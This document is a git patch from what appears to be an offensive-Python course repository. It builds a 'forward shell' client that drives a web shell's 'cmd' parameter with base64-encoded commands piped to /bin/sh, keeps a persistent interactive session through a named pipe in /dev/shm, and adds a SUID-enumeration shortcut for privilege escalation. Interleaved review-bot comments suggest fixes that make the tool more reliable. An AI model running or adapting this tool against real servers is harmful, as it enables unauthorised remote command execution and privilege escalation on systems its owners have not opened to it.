From d7252c6782d4eab1eb48f3db0ecbd3d1d3f46a5a Mon Sep 17 00:00:00 2001
From: Manuel Vergara
Date: Sat, 3 Feb 2024 12:28:27 +0100
Subject: [PATCH] Update forwardshell script
---
.../15_hacking/12_fs/script/forwardshell.py | 146 +++++++++++++++---
.../15_hacking/12_fs/script/main.py | 29 ++++
2 files changed, 154 insertions(+), 21 deletions(-)
create mode 100644 python-ofensivo/15_hacking/12_fs/script/main.py
diff --git a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
index 3c6725d..26ccebb 100644
--- a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
+++ b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
@@ -11,41 +11,145 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output """ import requests -import signal -import sys +import time from termcolor import colored from base64 import b64encode - -def def_handler(sig, frame): - - print(colored("\n[!] Exiting...", "blue")) - sys.exit(1) +from random import randrange -signal.signal(signal.SIGINT, def_handler) +class ForwardShell: -main_url = "http://localhost/index.php" + def __init__(self): + + session = randrange(100000, 999999) + + self.main_url = "http://localhost/index.php" + + self.stdin = f"/dev/shm/{session}.input" + self.stdout = f"/dev/shm/{session}.output" + + self.help_options = { + 'enum suid': 'FileSystem SUID Privileges Enumeration', + 'help': 'Show this help panel', + } + + self.is_pseudo_terminal = False + + def run_command(self, command): + + command = b64encode(command.encode()).decode() + + data = { + 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command + } + + try: + r = requests.get(self.main_url, params=data, timeout=5) + + return r.text + + except: + pass + + return None + + def write_stdin(self, command): + + command = b64encode(command.encode()).decode() + + data = { + 'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin) + } + + r = requests.get(self.main_url, params=data) + + def read_stdout(self): + + for _ in range(5): + + read_stdout_command = f"/bin/cat {self.stdout}" + output_command = self.run_command(read_stdout_command) + time.sleep(0.2) + + return output_command + + def setup_shell(self): + + command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}" + self.run_command(command) + + def remove_data(self): + + remove_data_command = f"/bin/rm {self.stdin} {self.stdout}" + self.run_command(remove_data_command) + + def clear_stdout(self): + + clear_stdout_command = f"echo '' > {self.stdout}" + self.run_command(clear_stdout_command) + + def run(self) -> None: + + self.setup_shell() + + while True: + + command = input(colored("> ", "yellow")) + + if "script 
/dev/null -c bash" in command: + + print( + colored("[+] Se ha iniciado una pseudo-terminal", "blue")) + self.is_pseudo_terminal = True -def run_command(command): + if command.strip() == "enum suid": - command = b64encode(command.encode()).decode() + command = f"find / -perm -4000 2>/dev/null | xargs ls -l" - data = { - 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command - } + if command.strip() == "help": - r = requests.get(main_url, params=data) + print(colored(f"\n[+] Listando panel de ayuda:\n", "blue")) - return r.text + for key, value in self.help_options.items(): + print(f"\t{key} - {value}") + + continue + + self.write_stdin(command + "\n") + + output_command = self.read_stdout() + + if command.strip() == "exit": + + self.is_pseudo_terminal = False + print(colored("[+] Se ha cerrado la pseudo-terminal", "blue")) + + self.clear_stdout() + continue -if __name__ == '__main__': + if self.is_pseudo_terminal: + lines = output_command.split("\n") - while True: + if len(lines) == 1: - command = input(colored("> ", "yellow")) - output_command = run_command(command) + cleared_output = '\n'.join([lines[-1]] + lines[:1]) - print(output_command) + elif len(lines) > 1: + + cleared_output = '\n'.join( + [lines[-1]] + lines[:1] + lines[2:-1]) + + else: + print(len(lines)) + print(lines) + + print(cleared_output + "\n") + + else: + + print(output_command) + + self.clear_stdout() diff --git a/python-ofensivo/15_hacking/12_fs/script/main.py b/python-ofensivo/15_hacking/12_fs/script/main.py new file mode 100644 index 0000000..c951144 --- /dev/null +++ b/python-ofensivo/15_hacking/12_fs/script/main.py 
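Review bot: `run_command` swallows every exception with a bare `except: pass` and falls through to `return None`, and nothing downstream handles that value: `read_stdout` passes it through unchanged and `run()` then calls `output_command.split("\n")` in the pseudo-terminal branch, which raises AttributeError, or prints a literal `None` otherwise. Narrow the handler to `except requests.RequestException: return None` and have `run()` check `if output_command is None:` before splitting (print a short message and `continue`, so a timed-out request does not crash the loop). Two related inconsistencies in the same hunk: `write_stdin` calls `requests.get` without the `timeout=5` that `run_command` uses and binds the response to an unused `r`, and `read_stdout` issues five requests through `run_command` while discarding all but the last, so the "wait" is five HTTP round-trips rather than one read after a delay. The `else` branch that prints `len(lines)` and `lines` is unreachable, because `str.split` always returns at least one element, so `cleared_output` is in fact always bound there and the branch can be dropped.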
@@ -0,0 +1,29 @@
+
+#!/usr/bin/env python3
+"""
+Fichero principal de la aplicaciĆ³n.
+"""
+
+import signal
+import sys
+
+from forwardshell import ForwardShell
+from termcolor import colored
+
+
+def def_handler(sig, frame) -> None:
+
+ print(colored("\n[!] Exiting...", "blue"))
+
+ my_forward_shell.remove_data()
+
+ sys.exit(1)
+
+
+signal.signal(signal.SIGINT, def_handler)
+
+
+if __name__ == '__main__':
+
+ my_forward_shell = ForwardShell()
+ my_forward_shell.run()
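Review bot: The shebang `#!/usr/bin/env python3` sits on line 2 of the new main.py, after an empty first line, so the loader will not honour it and the file only runs when the interpreter is invoked explicitly; drop the leading blank line. `def_handler` also reads the module global `my_forward_shell`, which is bound only inside the `if __name__ == '__main__':` block, so a SIGINT that arrives before `ForwardShell()` has returned (or while the module is merely imported) turns the handler into a NameError instead of a clean exit; bind `my_forward_shell = None` at module level and guard the cleanup with `if my_forward_shell is not None: my_forward_shell.remove_data()`. The module docstring looks mis-encoded (`aplicaciĆ³n`, presumably `aplicación` written with the wrong encoding), which is worth correcting while the file is new.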